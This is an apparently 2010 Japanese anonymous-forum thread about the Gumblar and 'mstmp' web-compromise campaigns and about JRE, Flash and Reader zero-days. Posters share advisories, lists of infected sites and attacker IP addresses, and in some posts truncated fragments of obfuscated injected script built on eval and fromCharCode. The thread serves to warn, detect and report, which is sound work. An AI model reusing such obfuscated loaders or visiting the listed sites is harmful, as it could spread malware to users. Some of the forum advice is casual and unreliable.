各ソフトウェアのバージョンはちゃんと確認しなおしてね!
422名無しさん@お腹いっぱい。:2010/10/26(火) 23:15:27
>>421
国内100社以上で感染被害を確認。?mstmp? ?lib.dll? のファイル名で拡散する不正プログラム
ttp://blog.trendmicro.co.jp/archives/3723

ttp://www.rbbtoday.com/article/2010/10/25/71502.html
ttp://journal.mycom.co.jp/news/2010/10/25/041/
上記のウィルス
一応、JAVAは、最新版、導入しました
423名無しさん@お腹いっぱい。:2010/10/27(水) 01:21:48
攻撃プログラムがJREのバージョンを見て、対象の脆弱性があるバージョンの場合は攻撃開始。
最新版を含む対象の脆弱性がないバージョンの場合は何もせずスルーするらしい。
424名無しさん@お腹いっぱい。:2010/10/27(水) 13:18:16
>>420
古いJREが残る場合もあるようだから消しとくといいのかも。
425名無しさん@お腹いっぱい。:2010/10/27(水) 19:21:58
>>413
> これってマイクロアドのヤツか?

マイクロアドじゃなくて、どこかのアクセス解析サービスらしい

アクセス解析サービスを使用した Web サイト経由での攻撃に関する注意喚起
ttp://www.jpcert.or.jp/at/2010/at100028.txt
426名無しさん@お腹いっぱい。:2010/10/27(水) 19:29:35
そのアクセス解析サービスはどこなんだろう?

本来は、そこをきちんと公開するべきじゃないのかな?
427名無しさん@お腹いっぱい。:2010/10/27(水) 23:35:39
[「mstmp」系ウイルス(仮称) に感染しているか確認する方法 ? にわか鯖管の苦悩日記]
ttp://kikuz0u.x0.com/blog/?p=644
428名無しさん@お腹いっぱい。:2010/10/28(木) 00:15:55
>>426
既に分かってるんだけど、JPCERTが言わないからまだ野放しにされている。
指摘を受けたところは調査中らしいけど。

http://d.hatena.ne.jp/connect24h/comment?date=20101022
429名無しさん@お腹いっぱい。:2010/10/28(木) 08:25:28
知ってる人は匿名掲示板(笑)とかどこかに書いてもいいのにね
アクセス解析というとxreaは昔やられてたな
430sage:2010/10/28(木) 14:28:35
知ってる人は知ってるからじゃね?
431名無しさん@お腹いっぱい。:2010/10/28(木) 16:30:02
[36億スパム配信の凶悪ボットネットが解体 G DATA]
http://gdata.co.jp/press/archives/2010/10/36.htm

↓スクリプトでリダイレクトされるファイルが昨日も更新されてる
netdekase5●sakura●ne●jp
shimadaaqua●sakura●ne●jp
umeshin●sakura●ne●jp
432名無しさん@お腹いっぱい。:2010/10/28(木) 16:32:45
いきなり襲ってきた「mstmp」ウィルスに大わらわ
ttp://itpro.nikkeibp.co.jp/article/COLUMN/20101027/353496/

413,428に引用されているblogの人が、経緯について詳しく説明している
433名無しさん@お腹いっぱい。:2010/10/28(木) 16:45:21
>>431
G DATAが言ってるのはGumblar 8080系の事で、Gumblar.xはまだ生きてるらしい
434名無しさん@お腹いっぱい。:2010/10/28(木) 17:13:46
Gumblar.xも日本弾きは継続中らしいから
海外の串でも使わんと影響ないだろ
435名無しさん@お腹いっぱい。:2010/10/28(木) 21:54:58
取扱注意
www●mypondstore●com/ThumbnailFrame●htm

<script>var XepaZerc='・・・・・

今騒いでるのはコイツだろ?
436名無しさん@お腹いっぱい。:2010/10/28(木) 22:06:09
flashplayerもjavaもMSUPDATEから出来ればもっと被害者減りそうなもんだが
437名無しさん@お腹いっぱい。:2010/10/29(金) 07:33:28
>>431
8080の方は更新止まってる
Gumblar.xが挿入してる「〜php」の部分が絶賛更新中

438名無しさん@お腹いっぱい。:2010/10/29(金) 08:44:32
Adobeの脆弱性が来たよん

Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat
Release date: October 28, 2010

Flash Playerはby November 9, 2010
Adobe Reader and Acrobatはduring the week of November 15, 2010

ttp://www.adobe.com/support/security/advisories/apsa10-05.html
439名無しさん@お腹いっぱい。:2010/10/29(金) 10:54:53
いっそのことFlashもクラウド化すりゃいいのに…
アップデートめんどい
440名無しさん@お腹いっぱい。:2010/10/29(金) 11:29:58
>>439
イミフ
441名無しさん@お腹いっぱい。:2010/10/29(金) 11:34:57
また勘違いクラウドかw
442名無しさん@お腹いっぱい。:2010/10/29(金) 11:51:01
脳みそもクラウド化
443名無しさん@お腹いっぱい。:2010/10/29(金) 12:01:05
“クラウド型”のウイルス対策ソフトってぶっちゃけどうなの?
http://hato.2ch.net/test/read.cgi/news/1288319125/
444名無しさん@お腹いっぱい。:2010/10/29(金) 12:18:22
クラウドw
セフィロスw
445名無しさん@お腹いっぱい。:2010/10/29(金) 15:12:02
http://hato.2ch.net/test/read.cgi/news/1288319125/32
catv?の人は去年から ここの感染URLを張り続けてますよね

そういう仕事なの?セキュリティ関連会社とか

446名無しさん@お腹いっぱい。:2010/10/29(金) 15:22:57
まぁほとんど狙われないんだけどついでに
Shockwave Player 11.5.9.615
ttp://www.adobe.com/support/security/bulletins/apsb10-25.html
447名無しさん@お腹いっぱい。:2010/10/29(金) 21:41:03
http://hissi.org/read.php/news/20101029/eWZwdmtCbnQw.html
http://hissi.org/read.php/news/20100923/RVFMTXcvWlow.html

スレ立て依頼してウイルスリンク張るのが
最近のスタイルなのかしら
448名無しさん@お腹いっぱい。:2010/10/30(土) 00:26:53
>>438
■【ゼロデイ攻撃】Adobe Reader/Flash Playerの未修整の脆弱性狙うトロイの木馬
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2391
>Adobe Reader/Acrobat 9.4およびそれ以前のバージョン
>Flash Player 10.1.85.3およびそれ以前のバージョン

■APSA10-05: Security Advisory for Adobe Flash Player, Adobe Reader and Acrobat(セキュリティホールmemo)
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/2010/10.html#20101029_Flash

今年何回目のゼロデイだよw
449名無しさん@お腹いっぱい。:2010/10/30(土) 00:46:28
ゼロデイの多さは人気の証(キリッ
なのにFlashを排除するAppleはおかしい
450名無しさん@お腹いっぱい。:2010/10/30(土) 01:46:52
アドベはもう本気で死ねよ
やる気無いならさっさと辞めちまえ!
451名無しさん@お腹いっぱい。:2010/10/30(土) 04:23:50
もうsilverlightでいいよ
452名無しさん@お腹いっぱい。:2010/10/30(土) 10:46:20
>>442
激しくワロタw
453名無しさん@お腹いっぱい。:2010/10/30(土) 10:49:01
ここまで執拗に adobe が狙われるのって、流石に何らかの意図を感じるね…

何の利害関係も無いスーパーハカーが、狙いやすいからやってるとかの問題じゃないような気がするんだけど…
454名無しさん@お腹いっぱい。:2010/10/30(土) 11:07:43
狙われてるのは利用者が多い上に脆弱性があるからだよ
455名無しさん@お腹いっぱい。:2010/10/30(土) 13:28:36
日数が経てばセキュリティソフトが対応するから、
ゼロデイ放置のほうが安全なような気がしてきたw
456名無しさん@お腹いっぱい。:2010/10/30(土) 16:56:49
そんなわけないだろアホか
457名無しさん@お腹いっぱい。:2010/10/30(土) 17:02:33
>>455
http://internet.watch.impress.co.jp/docs/news/20101029_403477.html
>Flash Playerでは、Windows/Macintosh/Linux/Solaris版のバージョン10.1.85.3以前と、Android版の10.1.95.2以前が影響を受ける。
458名無しさん@お腹いっぱい。:2010/10/31(日) 08:45:16
オレーシャ・ソロキナ豚が何たらこうやらwww
459名無しさん@お腹いっぱい。:2010/10/31(日) 08:47:25
フジテレビで特集中
460名無しさん@お腹いっぱい。:2010/10/31(日) 09:35:26
親が喧嘩ふっかけてきて、ろくに見れんかった
461名無しさん@お腹いっぱい。:2010/10/31(日) 11:01:12
やっぱyoutubeやニコニコも狙われてるのかな?
462名無しさん@お腹いっぱい。:2010/10/31(日) 16:42:46
Flash Playerの脆弱性狙いはFIREFOXの場合はStop AutoplayかFlash Blockで
flashを遮断すれば大丈夫なのでしょうか?
463名無しさん@お腹いっぱい。:2010/10/31(日) 18:44:59
>>462
意味茄子
464名無しさん@お腹いっぱい。:2010/10/31(日) 22:03:15
Flash Playerアンインスコおすすめ
465名無しさん@お腹いっぱい。:2010/11/01(月) 01:46:18
>>462
Flash Playerは代替品が無いというのが痛いなw
466名無しさん@お腹いっぱい。:2010/11/01(月) 10:46:53
さっさとHTML5(笑)標準化しろよ
まあそうなると98以前では動画とか見れなくなるが…
467名無しさん@お腹いっぱい。:2010/11/01(月) 13:11:30
国内の多数サイトに影響、JRE悪用するウイルス感染について注意

株式会社ラックは10月29日、国内の多数のサイトで発生したガンブラー型攻撃による
ウイルス感染の実態について、特徴や手口の傾向が判明したとして、注意喚起を公表した。

ウイルスが接続を試みるIPアドレスは、以下のアドレス。
[64.27.25.223]、[64.27.25.224]、[88.80.7.152]、[85.17.209.3]、
[95.211.111.229]、[95.211.108.93]、[178.63.62.19]
http://internet.watch.impress.co.jp/docs/news/20101101_403962.html
468名無しさん@お腹いっぱい。:2010/11/01(月) 15:46:41

>今回確認された攻撃ではJava Runtime Environment(JRE)の脆弱性(CVE-2008-5353)を悪用することが確認された。
>ラックでは、多くの組織で社内システムやパッケージソフトに付属するそれぞれのJREを使用しているケースが見受けられ、
>そのためにJREのセキュリティ対策を適切に取れず、被害が相当数の企業に拡散していることが推測されるとしている。

CVE-2008ってことは2年前かと思ったら[CVE-2010-0094]もあるらしい

[アフィリエイトによる金銭取得が目的か!? −“mstmp””lib.dll”攻撃続報 | トレンドマイクロ セキュリティ ブログ]
http://blog.trendmicro.co.jp/archives/3728
469名無しさん@お腹いっぱい。:2010/11/01(月) 17:17:15
CVE-2010-0094でも3月のJava6Update19で修正されているんだから
半年も放置して感染したボンクラが救いようもないことにかわりはない
470名無しさん@お腹いっぱい。:2010/11/01(月) 17:20:47
【GENOウイルス注意!】Java(JRE)の脆弱性を悪用するウイルス感染の特徴や手口が判明した模様
http://hato.2ch.net/test/read.cgi/news/1288588760/
471名無しさん@お腹いっぱい。:2010/11/01(月) 22:18:10
472名無しさん@お腹いっぱい。:2010/11/02(火) 15:25:37
JAVA入れてなかった
473名無しさん@お腹いっぱい。:2010/11/02(火) 22:52:40
超CGキタ━━━━━━(゚∀゚)━━━━━━ !!!!!
474名無しさん@お腹いっぱい。:2010/11/02(火) 22:53:28
誤爆したすまん
475名無しさん@お腹いっぱい。:2010/11/03(水) 00:54:11
Gumblar8080攻撃のその後 〜Bredolabは本当に死んだのか〜
https://www-950.ibm.com/blogs/tokyo-soc/entry/gumblar8080_20101102?lang=ja

「8080は滅びぬ、何度でも蘇るさ」
476名無しさん@お腹いっぱい。:2010/11/03(水) 03:36:46
skyhigh-read●com/

ブラウザとavastが反応
これはガチ?
477名無しさん@お腹いっぱい。:2010/11/03(水) 04:00:29
>>476
>>475
■オランダ当局がBredolabボットネットを閉鎖〜関連不明も8080系攻撃は停止中
ttp://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2393

突っ込まれてるコード(URL)は現時点では無害。
・・だが、この先どうなるかは誰も知らん。
478名無しさん@お腹いっぱい。:2010/11/03(水) 04:02:23
470のスレがDAT落ちしているようだが続きが気になる
479名無しさん@お腹いっぱい。:2010/11/03(水) 04:11:15
>>477
把握
480名無しさん@お腹いっぱい。:2010/11/03(水) 10:54:41
>>478
これのこと
genoウイルスとかなってるがぜんぜん関係ない
tp://blogs.yahoo.co.jp/noooo_spam/60457929.html
481名無しさん@お腹いっぱい。:2010/11/03(水) 17:37:18
>>480
ありがとう
482名無しさん@お腹いっぱい。:2010/11/03(水) 21:29:08
>>480
>ぜんぜん関係ない
その記事には「ガンブラー型攻撃」って書いてあるし
Gumblarで盗まれたアカウントが使われたかもよ

多サイトにスクリプトを置く、価値の高いアカウントだから変化をつけたとか
マイクロアドのも似てるし

http://gw.aguse.jp.nyud.net/?aguse_&aguse_url=http://hoodrugs.com/
>悪者は盗んだアカウント情報を“温存”している?
483482:2010/11/03(水) 21:33:43
ごめん、「その記事」じゃなくて>>470の元ネタの記事だった
484名無しさん@お腹いっぱい。:2010/11/04(木) 07:23:33
[【要注意】現在「ウェブ魚拓」がウィルスに感染している模様 : 馬鹿の野望byはなゆー]
ttp://kitamakura.seesaa.net/article/168211287.html
485名無しさん@お腹いっぱい。:2010/11/04(木) 08:25:53
まー マジであっちこっちに感染してるなー
ほんとに仮想PCでネットすること考えないとダメかこりゃ
486名無しさん@お腹いっぱい。:2010/11/04(木) 08:33:26
おかしいと思ったらこのざまorz
魚拓踏みまくってるしw
487名無しさん@お腹いっぱい。:2010/11/04(木) 11:33:54
>>484
ウィルスに感染しているサイトの魚拓を閲覧したとかじゃないの?
488名無しさん@お腹いっぱい。:2010/11/04(木) 12:31:29
感染してたら
そのまま保存されるからな
489名無しさん@お腹いっぱい。:2010/11/04(木) 13:30:32
魚拓を取ろうとするとエラーが出たり
表示できても時間を置くと見れなくなる

10月31日以降の魚拓が見れない異常事態
http://megalodon.jp/pc/history/20101031
http://megalodon.jp/pc/history/20101101

"Nine-Ball"ってGumblar型の攻撃だと思うけど
魚拓に対しての攻撃みたいだ
490名無しさん@お腹いっぱい。:2010/11/04(木) 13:54:33
infoseekの無料版が終了する影響で負荷増加とかにしても期間長いしね
491名無しさん@お腹いっぱい。:2010/11/04(木) 14:06:36
ガンブラー?ウェブ魚拓が感染      か
http://hato.2ch.net/test/read.cgi/news/1288846500/
492名無しさん@お腹いっぱい。:2010/11/04(木) 20:43:08
ウェブ魚拓スレより
91 名無しさん@お腹いっぱい。 [sage] 2010/11/04(木) 20:21:19 ID: Be:
株式会社アフィリティー ≫ Blog Archive ≫ ウェブ魚拓がウイルスに感染したという情報が流れている件につきまして
http://www.affility.co.jp/archives/229
493名無しさん@お腹いっぱい。:2010/11/04(木) 20:44:11
>>492

リンク先より一部抜粋

>技術担当です。
>利用者の皆様にはご心配をおかけして申し訳ありません。

>ウイルス感染およびウェブサイトの改竄、侵入等について調査しましたが、確認できておりません。
>ウェブサーバの設定は書き換えられておらず、ウェブ公開フォルダの中にも不審なファイルは見つかりませんでした。
494名無しさん@お腹いっぱい。:2010/11/04(木) 21:56:34
【無】の中の人へ
「ソコ」は.htaccessやられてるみたいだぬ。

>ちょめちょめ●ru/mymap/

referer:ちょめちょめ●ru/mymap/
→404 Not Found

referer:www.帝國.com/
→iframe イパーイ

危険なので以下略とす
495494:2010/11/04(木) 22:01:46
追記
UA見てるから、IE6(笑)とかで凸すr(ry
496/名無しさん[1-30] ◆.htmlint.U :2010/11/04(木) 22:07:06
(・3・) エェー
(・3・) リファラ当てるの苦手YO

.htaccessかお。。。
497/名無しさん[1-30] ◆.htmlint.U :2010/11/04(木) 22:15:50
あっ誤爆。
【無】の中の人とは違いますお。
498名無しさん@お腹いっぱい。:2010/11/04(木) 23:14:10 BE:2730903168-PLT(20000)
499名無しさん@お腹いっぱい。:2010/11/04(木) 23:44:01
株式会社アフィリティー ≫ Blog Archive ≫ ウイルス正体判明
http://www.affility.co.jp/archives/233

一部抜粋
>2008年の1月にウイルスが含まれるウェブサイトの魚拓をとった人がいたようです。
〜中略
>最近になって誰かがウイルスソフトを稼働させながら、この魚拓を閲覧して、
>サイト全体が感染している可能性があるとみなされ、その情報が共有されたのだと思われます。

これから感染したサイトの魚拓はとらない方が良さそうだね
500名無しさん@お腹いっぱい。:2010/11/04(木) 23:54:56
ウイルスソフト……?
501名無しさん@お腹いっぱい。:2010/11/05(金) 08:53:29
XP使うならJavaもFlashもPDFも無効にしろ、
JavaやFlashやPDF使うなら、Vista以降で保護モード使え
一般社員には管理者権限でログインさせんな

ってことでだいたい防御できるのにね
502名無しさん@お腹いっぱい。:2010/11/05(金) 11:33:01
Flash 10.1.102.64になったよ
503名無しさん@お腹いっぱい。:2010/11/05(金) 12:58:27
そのうちAndroidでも脆弱性つかれたりするんだろう
そうなったら被害が怖いな
ほんとうにFlashはこの先無くなったほうがいいかもね
ジョブズの気持ちも分からんでもない
504名無しさん@お腹いっぱい。:2010/11/05(金) 13:54:02
ジョブズには脆弱性に関してどうこう言う資格がないだろ。
AppleもAdobeに負けず劣らず0-day状態のままほったらかす体質じゃないか。
505名無しさん@お腹いっぱい。:2010/11/05(金) 14:17:17
>>502
トン
506名無しさん@お腹いっぱい。:2010/11/05(金) 14:54:22
chromeだと10,1,103,19 になるんだけどまたすぐ更新が出るのかな
507名無しさん@お腹いっぱい。:2010/11/05(金) 18:37:53
chromeについてくるFlashはgoogleが勝手に更新してくれたような
508名無しさん@お腹いっぱい。:2010/11/05(金) 20:40:24
勝手に更新するんだけどIE他向けに出ているバージョンと違うので差分が気になる
同じバージョンがIE他でも出るのかどうか
509名無しさん@お腹いっぱい。:2010/11/05(金) 21:21:06
たぶん出ない
Googleが好き勝手に改造してるんだろうし、
AppleにボコられてヘコんでるAdobeに
今の強大なGoogle帝国に意見する度胸は無い
510名無しさん@お腹いっぱい。:2010/11/06(土) 00:56:38
>>509
■AdobeがFlashの深刻な脆弱性を解決、Readerに新たな問題発覚
ttp://www.itmedia.co.jp/enterprise/articles/1011/05/news045.html
>これとは別にAdobeは同日、Readerの新たな問題がセキュリティメーリングリストに公表されたことを明らかにした。

このザマだからなw
511名無しさん@お腹いっぱい。:2010/11/06(土) 12:44:38
Flash Player更新したらYouTubeの各ユーザーのチャンネルがきちんと見られない・・・
512名無しさん@お腹いっぱい。:2010/11/06(土) 17:51:24
そういうスレじゃない
513名無しさん@お腹いっぱい。:2010/11/06(土) 17:51:58
設定弄ってみれば?
514名無しさん@お腹いっぱい。:2010/11/06(土) 22:55:43
ドメイン見て吹いた
inininininininin●in
comcomcomcomcomcom●com
515名無しさん@お腹いっぱい。:2010/11/07(日) 08:14:50
なんかもう形振り構ってられなくなったのかな…
516名無しさん@お腹いっぱい。:2010/11/07(日) 20:45:54
魚拓の過去分がゴッソリまるごと消えてる
http://megalodon.jp/pc/history
517名無しさん@お腹いっぱい。:2010/11/08(月) 18:14:07
こうなった以上仕方ないだろ
518名無しさん@お腹いっぱい。:2010/11/09(火) 21:44:43
n-yamashita●sakura●ne●jp
lovecosme●sakura●ne●jp/04-05
mirai-inc●net
prim-co●sakura●ne●jp
kajitakashi●sakura●ne●jp
moninet●sakura●ne●jp/ampleur-mania
e-cabinet●sakura●ne●jp/heb

77mail●sakura●ne●jp
barkays●sakura●ne●jp
ontheperch●sakura●ne●jp
sigoto-design●sakura●ne●jp

さくらに数ヶ月前に通報したけど反応なし
スパムメールの転送とか、リンク切れで危険度低

[2年連続で「.jp」は世界で最も安全な国別ドメインと評価 / 株式会社日本レジストリサービス(JPRS)]
http://jprs.co.jp/press/2010/101027.html


519名無しさん@お腹いっぱい。:2010/11/11(木) 14:14:10
万一ゼロデイなどで感染した場合
現在有効な感染の確認方法は無いでしょうか?
520名無しさん@お腹いっぱい。:2010/11/11(木) 14:16:14
ほとんどない

だからみんな困ってる
521名無しさん@お腹いっぱい。:2010/11/11(木) 15:24:22
見つからないようにこっそりやりたいのにそんな簡単に確認できる機構を作るわけないよね
522名無しさん@お腹いっぱい。:2010/11/11(木) 16:52:29
初心者的な意見で意味無いかもしれないけど
駆除はともかく発見だけなら
bitdefenderとEmsisoftEmergencyKitのコマンドラインスキャンと
常駐アンチウイルスソフトによるCドライブのスキャンならいいのでは
対応してれば何とかなると思うけどだめかな
523名無しさん@お腹いっぱい。:2010/11/11(木) 17:33:40
>>522
未知の脆弱性を見つけるような連中だから
主要なウイルス対策ソフトに発見されないように拡散前にチェックしているかと。
524名無しさん@お腹いっぱい。:2010/11/11(木) 17:38:27
未知の脆弱性なんて突かれるようなことはほとんどないよ
ただ修正されてないだけで
525名無しさん@お腹いっぱい。:2010/11/11(木) 17:41:01
脆弱性が発表されると
すぐにそれを付くマルウェアが出てくる
発表しない方が良いくらいにも思える
526名無しさん@お腹いっぱい。:2010/11/11(木) 17:43:13
たいていのセキュリティソフトは新型に対しては後手に回ってしまっているのが実情
セキュリティソフトは必要最低限の備えであって過信していいもんじゃないよ
基本的にはできる範囲で他の対策も行わないと意味がない
といっても回避策のないゼロデイ攻撃が発生しちゃうと正直どうしようもないね
でもだいたい回避策あるけどね
527名無しさん@お腹いっぱい。:2010/11/11(木) 17:48:06
こまめなシステムのバックアップ
それが一番じゃないかな
528名無しさん@お腹いっぱい。:2010/11/11(木) 17:48:15
回避策がないとかあるとか何言ってんだよ
分かってねえくせに知ったかよしてくれ
529名無しさん@お腹いっぱい。:2010/11/11(木) 18:04:29
この間のFlashには回避策はなかったな
現在ゼロデイ中のAdobe Reader(Acrobat)には回避策はあるが
結局は脆弱性の内容によるらからな
530名無しさん@お腹いっぱい。:2010/11/11(木) 20:23:28
き・・脆弱性
531名無しさん@お腹いっぱい。:2010/11/12(金) 18:13:18
>>510
すでに攻撃受けてるみたいだね
それらしい報告あがってたわ
532名無しさん@お腹いっぱい。:2010/11/12(金) 19:44:15
Adobe Readerは初期設定でスクリプトやらマルチメディアやら無効にすればいいのにな。
533名無しさん@お腹いっぱい。:2010/11/12(金) 20:34:56
flashplayerの方のゼロデイはブラウザの設定か他のソフトの設定で無効にしとけばいけるんじゃね?
534名無しさん@お腹いっぱい。:2010/11/14(日) 09:37:12
[Internet Explorerのゼロデイ脆弱性を悪用するドライブ・バイ・ダウンロード攻撃を確認Tokyo SOC Report]
https://www-950.ibm.com/blogs/tokyo-soc/entry/ie-0day_20101108?lang=ja

535名無しさん@お腹いっぱい。:2010/11/15(月) 16:25:39
踏み台にされるWebサイト〜いわゆるGumblarの攻撃手法の分析調査〜
(JPCERT コーディネーションセンター 研究・調査レポート)
http://www.jpcert.or.jp/research/#webdefacement
536名無しさん@お腹いっぱい。:2010/11/15(月) 22:00:23
JSU●○●○●
fb742cde7f13f6aa9678cb7ab0ebac982a527d3d
537名無しさん@お腹いっぱい。:2010/11/15(月) 22:38:55
取扱注意

>TIA及び当羽田空港支店はフライトシミュレータ上の架空航空会社(VA)であります。
f45●aaa●livedoor●jp/~haneda/
→tour1●htm
→staff1●htm
他にも・・・

・がんぶらー
・8080
・<script>var XepaZerc=
・<script>function 〜
・fff.op.replace (468)
・がんぶらーっぽいの(最下部)
538/名無しさん[1-30] ◆.htmlint.U :2010/11/16(火) 01:07:34
>>537
とりぷるあにつーほ。
539名無しさん@お腹いっぱい。:2010/11/20(土) 16:32:39
aguseのトップページ真っ白なんだけどなんかあったん?
540名無しさん@お腹いっぱい。:2010/11/21(日) 22:45:04
鯖落ちだろ
541名無しさん@お腹いっぱい。:2010/11/22(月) 17:51:21
www●isumiskyhotel●com/
こんなに沢山入っているホテルというのもね。
こんなところに止まったら個人情報心配
542名無しさん@お腹いっぱい。:2010/11/22(月) 19:41:01
>>541
>>541
これは悪質ですね。絞り込んでいませんが、、、
File name: www.isumiskyhotel.com.txt Submission date: 2010-11-22 09:19:37 (UTC) Result: 27/ 42 (64.3%)
http://www.virustotal.com/file-scan/report.html?id=3805f290f0b19e19ec2f4753fcdb5e6001770f05dd6f574a2b1f05685c309a29-1290417577

http://maps.google.co.jp/maps/place?hl=ja&um=1&ie=UTF-8&q=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%
9B%E3%83%86%E3%83%AB&fb=1&gl=jp&hq=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%
AB&hnear=%E3%81%84%E3%81%99%E3%81%BF%E3%82%B9%E3%82%AB%E3%82%A4%E3%83%9B%E3%83%86%E3%83%AB&cid=10998837259304234162
電凸してみました。

「ごつごうかけているところはございません」
「大丈夫ですよ」 だそうです。

意味が分かりません。対応終了。
543名無しさん@お腹いっぱい。:2010/11/22(月) 20:15:32
>>541
                                                     / ,. -――- 、 l   〃
  ┏┓  ┏━━┓┏━┓    ┏┓  ┏┳┓              //: : : : !\:_:|:_: \/ハ              ┏┓┏┓
┏┛┗┓┃┏┓┃┗━╋┳┓┃┗━┻╋┛    ┏┓     〃: : :!、: : :|/∨ヘ : : !ヽ|              ┃┃┃┃
┗┓┏┛┃┗┛┃┏━┻╋┛┃┏┓┏┛┏┓  ┃┃┏━ f: : |斗-\| '下ハミV h: :! .━━━━┓  ┃┃┃┃
┏┛┗┓┃┏┓┃┗┓┏┛  ┗┛┃┃  ┃┃  ┃┃┃   |: : ハ      マり |: :リ、: \ .       ┃  ┃┃┃┃
┗┓┏┛┗┛┃┃  ┃┃        ┃┃  ┗┛┏┛┃┗━ lハハい == , . へ   |: :l: 、\: \ __━┛  ┗┛┗┛
  ┃┃      ┃┃┏┛┃      ┏┛┃  ┏━┛┏┛        }ハ   く{  }/|: :|\\\: : : : `\  .┏┓┏┓
  ┗┛      ┗┛┗━┛      ┗━┛  ┗━━┛        /;|: |>r--rf  |: :l- 、\\\ ̄`\\┗┛┗┛
544名無しさん@お腹いっぱい。:2010/11/23(火) 00:10:30
>>541
警察に通報したほうが良いと思ふ。
545名無しさん@お腹いっぱい。:2010/11/23(火) 12:16:13
この手の注意を営業妨害だと逆ギレするのが珍しくないくらいのキチガイ業界だからな。
546名無しさん@お腹いっぱい。:2010/11/23(火) 19:27:02
何が悪いのかわからない奴に説明するのはほんと難しいよ
547/名無しさん[1-30] ◆.htmlint.U :2010/11/23(火) 21:38:28
>>541-542
おつぅ。
おしんにメル。
548名無しさん@お腹いっぱい。:2010/11/24(水) 20:44:44
shop-pro●jp/
通販サイトだが
グーグルのセーフブラウジングによると怪しい
549名無しさん@お腹いっぱい。:2010/11/24(水) 21:57:15
>>548
んー今は警告でてないようですが
「最後に検出されたのは2010-09-21」となってて時間が立ちすぎとる
***.shop-pro.jp のアドレスで個々にショップ運営できるようなので、
その中のどっかが過去にやられたとか?
550名無しさん@お腹いっぱい。:2010/11/24(水) 22:12:59
ヒント:新手のアフィ
551548:2010/11/25(木) 00:19:36
>>549
気が付くのが遅れて無念だ
トップページは大丈夫そうだか
これではどこがやられたかかわからん

>>550
他のサイトへのリンク先がやられた可能性もあるな
552名無しさん@お腹いっぱい。:2010/11/25(木) 09:29:31
Windowsに未修正の脆弱性か、権限昇格の恐れ
http://www.itmedia.co.jp/news/articles/1011/25/news026.html
553名無しさん@お腹いっぱい。:2010/11/25(木) 13:07:24
>>548-551
初心者の意見ですみません
私は通販をよく利用するのですが
例えば「***.shop-pro.jp」のそこの個人の場所自体がセーフブラウジングで過去にやられてなければ
その通販サイトは現段階までは安全ということでしょうか
私としては更新も対策もしていますが、自分が感染してなくても
サイトの方がやられて個人情報が漏れることも有り得るのですよね?
554名無しさん@お腹いっぱい。:2010/11/25(木) 13:51:12
>>553
特定の個人商店だけが被害にあってただけなら他は問題ない
全体がやられてたならアウト
現時点では被害範囲が判断不能なのでなんともいえない

通販サイトを利用してる時点で個人情報漏洩の危険性は認識してなきゃいけない
絶対安全なサイトなんて無いです
555名無しさん@お腹いっぱい。:2010/11/25(木) 14:05:52
>>553
個人情報に関しては社員・派遣・契約社員が漏えいするという人的危険とこういう技術的危険があるね
トロイなり、Gumblarなりウイルスが仕組まれているのに気付かない、放置してる会社は
技術的にも人的にも個人情報漏えいリスクが高そうだ
556名無しさん@お腹いっぱい。:2010/11/25(木) 16:58:26
>>552
>悪用はローカルでのみ可能
557名無しさん@お腹いっぱい。:2010/11/25(木) 19:16:29
>>549
少なくともshop-pro.jp本家の管理人は2ヶ月の間に対策したのかな?
とにかく杜撰な管理が多いな
558名無しさん@お腹いっぱい。:2010/11/25(木) 19:40:09
559名無しさん@お腹いっぱい。:2010/11/26(金) 11:33:56
電話用サイトだが、いちおう
shiprip●com/sponge/bob/i/index●html
→<script>var NehQen=
→<script>function aY

新型っぽいの
<script>win=window;gar=win['String'];ga='l';g=win['eva'+ga];sf=ga.rfromCharCode;g(sf(4.5*2,52.5*2,51*2,16*2,20*2・・・・・中略・・・・・))</script>
※装填されてるサイトのURLは非公開とす
560名無しさん@お腹いっぱい。:2010/11/26(金) 11:58:27
>>548
たぶんここだぬ
izu-shizen●shop-pro●jp/

ここ見ればわかるんじゃね?
izu●sakura●ne●jp/
※がんぶらーっぽいのが装填中w
561名無しさん@お腹いっぱい。:2010/11/26(金) 14:26:12
会社にメールしてもISPにメールしても対処しない会社
satokk●co●jp
criminal●co●jp Gumblar.X
motif●jp
www●la-palmedor●com/patis-shop●html  Gumblar.X

ここなんかは、お薬さんスパムのリダイレクトページがある
i-medical●co●jp/ration73●html
562/名無しさん[1-30] ◆.htmlint.U :2010/11/26(金) 16:51:56
>>561
おしん…

作業に入るお。。。
563名無しさん@お腹いっぱい。:2010/11/26(金) 17:41:16
www●ropponngi●com
www●soyo-pet●com
www●trickys-custom●net
www●ando-kagu●com
www●fairwayinc●jp
www●heisei-tech●com
tensou●daishin-inc●jp
www●100yen●co●jp
interior-myhouse●com
royal-cbj●jp
www●ltsgo●co●jp
matsuri●co●jp
www●yamaharu-tosou●co●jp
www●matsudakagu●co●jp←これなんかよく見る家具メーカだけど連絡しても全く無視
564/名無しさん[1-30] ◆.htmlint.U :2010/11/26(金) 19:27:18
>>561
さっきまであったけど一番下404になっちゃたのね。なのでつーほしませんでした。
他、おしんとJPCERT/CC、情報処理推進機構(IPA)セキュリティセンター(ISEC)につーほ。

>>563
うげげ、目が逝っちゃうお。。。
565名無しさん@お腹いっぱい。:2010/11/26(金) 22:03:29
Gumblarじゃないけど、2chにXSS脆弱性が発覚
ttp://qb5.2ch.net/test/read.cgi/operate/1290578495/859

でも、Vista+IE8だと、IEがXSSを検出してスクリプトの動作を制限するので影響うけず
IE7以下やFirefixだとアウト?
566名無しさん@お腹いっぱい。:2010/11/27(土) 20:03:34
>>541は表示されなくなってるね
567/名無しさん[1-30] ◆.htmlint.U :2010/11/29(月) 02:20:43
>>561
一番下、今繋がった。
飛び先はチェックサイトを蹴っている模様。
おしんとかにつーほ。
568bcc:2010/11/29(月) 16:32:04 BE:702028962-2BP(1234)
www●rctank●jpはまだ感染放置かよ
569名無しさん@お腹いっぱい。:2010/11/29(月) 16:56:27
ドムスで商品を注文しようという方はご注意ください!
www*geocities*jp/feb1710/index*html
====
こんな書き込みもあるくらいだから本人は何もしないのでしょう。
デジロックでなければ、こんなサイトは表示停止にしてもらえる
のだが。。。。
